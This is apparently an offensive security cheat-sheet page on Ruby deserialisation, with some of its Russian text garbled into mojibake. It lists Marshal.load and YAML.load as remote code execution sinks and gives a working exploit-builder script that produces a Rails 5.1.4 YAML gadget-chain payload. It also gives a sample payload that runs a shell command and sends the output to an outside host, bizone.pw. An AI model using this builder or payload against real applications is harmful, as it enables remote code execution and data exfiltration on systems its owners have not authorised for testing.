Deserialisation
md Π½Π° github ΠΎ Π΄Π΅ΡΠ΅ΡΠ΅ Π² Ruby: https://github.com/httpvoid/writeups/blob/main/Ruby-deserialization-gadget-on-rails.md
Marshal.load(<user_input>) = RCE
Ruby Marshal+Base64 RCE payload playground/generator: https://repl.it/@allyshka/Ruby-RCE-with-Marshalload
Other guide: https://www.elttam.com/blog/ruby-deserialization/
YAML.load(<user_input>) = RCE
Rails 5.1.4 YAML unsafe deserialization RCE payload
Example: https://gist.github.com/niklasb/df9dba3097df536820888aeb4de3284f
Π’ΠΎΡΠ½ΠΎ ΡΠ°Π±ΠΎΡΠ°Π΅Ρ Π½Π° Rails 5.1.4
require "erb"
require "base64"
require "active_support"
if ARGV.empty?
puts "Usage: exploit_builder.rb <source_file>"
exit!
end
erb = ERB.allocate
erb.instance_variable_set :@src, File.read(ARGV.first)
erb.instance_variable_set :@lineno, 1
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result
payload = Base64.encode64(Marshal.dump(depr))
puts <<-PAYLOAD
---
!ruby/object:Gem::Requirement
requirements:
- !ruby/object:Rack::Session::Abstract::SessionHash
req: !ruby/object:Rack::Request
env:
rack.session: !ruby/object:Rack::Session::Abstract::SessionHash
loaded: true
HTTP_COOKIE: "a=#{payload}"
store: !ruby/object:Rack::Session::Cookie
coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}
key: a
secrets: []
exists: true
PAYLOADΠΡΠΈΠΌΠ΅Ρ payload:
require "base64"
out = `pwd`
url = URI.parse('http://bizone.pw')
req = Net::HTTP::Get.new(url.to_s + '/?q=' + Base64.strict_encode64(out))
res = Net::HTTP.start(url.host, url.port) {|http|
http.request(req)
}Last updated